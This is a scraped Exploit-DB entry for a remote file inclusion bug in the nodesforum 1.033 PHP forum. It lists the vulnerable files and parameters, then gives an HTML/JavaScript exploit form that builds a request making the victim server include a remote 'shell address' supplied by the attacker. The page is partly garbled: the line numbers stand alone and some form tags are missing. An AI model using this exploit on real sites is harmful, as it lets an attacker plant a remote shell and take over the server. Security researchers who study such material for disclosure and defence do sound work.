nodesforum 1.033 – Remote File Inclusion - 体验盒子

作者： ITSecTeam

日期： 2010-04-04

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12047/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

<html>

<head>

<title>coded by ahmadbady</title>

//===========================================================================

//( #Topic: nodesforum_1.033

//( #Bug type : multi remote file include

//( #Advisory :

//===========================================================================

//( #Author : ItSecTeam

//( #Email: Bug@ITSecTeam.com

//( #Website: http://www.itsecteam.com

//( #Forum: http://forum.ITSecTeam.com

//vuls---------------------------------------------------------------------

//erase_user_data.php line 6;

//pre_output.php line 16 ;

//--------------------------------------------------------------------------

var variable1 ="?_nodesforum_path_from_here_to_nodesforum_folder="

var variable2 ="?_nodesforum_code_path="

function it(){

if (xpl.file.value=="pre_output.php"){

variable1 = variable2;

}

xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+variable1+xpl.shell.value;xpl.submit();

}

</script>

</head>

<p align="left"><font color="#FF0000">vul1 file:/path/erase_user_data.php</font></p>

<p align="left"><font color="#FF0000">vul2 file:/path/pre_output.php</font></p>

<font

size="2" face="Tahoma">

victim:

path:

file:

shell address:

</p>

</p>

<p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset"

value="reset" name="B2" style="float: left"></p>

</form>

<p><br>

</p>

</center>

</body>

</html>